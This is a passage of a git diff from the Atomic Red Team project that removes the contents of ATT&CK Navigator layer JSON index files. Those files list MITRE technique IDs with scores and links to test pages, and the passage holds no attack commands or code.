Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]}]} \ No newline at end of file + diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json index 964bc447..e69de29b 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json @@ -1 +0,0 @@ -{"version":"4.3","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 0a8439f4..e69de29b 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +0,0 @@ -{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View 